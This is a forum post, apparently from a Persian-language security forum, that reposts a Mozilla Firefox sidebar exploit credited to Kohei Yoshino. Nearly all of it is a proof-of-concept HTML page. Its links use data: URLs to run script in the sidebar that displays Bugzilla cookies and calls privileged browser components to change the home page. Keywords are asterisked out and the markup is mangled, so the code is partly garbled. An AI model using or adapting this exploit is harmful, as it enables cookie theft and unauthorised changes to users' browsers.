اطلاعیه

Collapse
No announcement yet.

Mozilla Firefox URLs ****** Injection (Exploit)

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • Mozilla Firefox URLs ****** Injection (Exploit)

    کد PHP:
    Exploit:
    // Exploit by Kohei Yoshino
    < !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"
    >
    html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    head>
    meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    title>Sidebar AttackReloaded< /title>
    < /
    head>
    body>
    p>1. a href="#" target="_search" onclick="location.href = 'https://bugzilla.mozilla.org/';">Click here to strong>open this page into sidebar< /strong>.< /a>< /p>
    p>2. a href="data:text/html,< ******>document.write(document.****ie);< /******>">Click here to strong>steal your ****ies< /strongon Bugzilla.< /a>< /p>
    p>3. Thenopen about:config in content area.< /p>
    p>4. a href="data:text/html,< ******>Components.classes['@mozilla.org/preferences-service;1'].getService( Components.interfaces.nsIPrefBranch ).setCharPref('browser.startup.homepage', 'http://www.mozdev.org/');< /******>">Click here to strong>change your home page to mozdev.org< /strong>.< /a>< /p>
    < /
    body>
    < /
    html
Working...
X